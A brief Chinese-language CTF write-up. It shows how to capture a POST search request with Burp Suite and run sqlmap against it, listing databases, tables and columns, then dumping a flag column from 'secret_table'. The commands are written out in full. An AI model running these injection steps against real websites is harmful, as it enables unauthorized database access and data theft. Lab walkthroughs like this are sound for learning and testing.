題目信息:
工具:bp,SQLmap
知識點:sql注入之post注入
打開題目,有一處搜索框,搜索新聞。考慮SQL注入。
隨便輸入一個2,用bp抓包,發現是post方式,然後Copy to file,將報文保存爲txt文件。
保存爲123.txt
然後用sqlmap一鍵注入(-r 表示從一個文件中載入HTTP請求,123.txt如果沒有放到sqlmap目錄就用絕對路徑)
0x01:查找數據庫
python sqlmap.py -r D:\SQLmap\123.txt --dbs
0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news
0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table
0x04:顯示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g
參考:sqlmap用於sql注入語法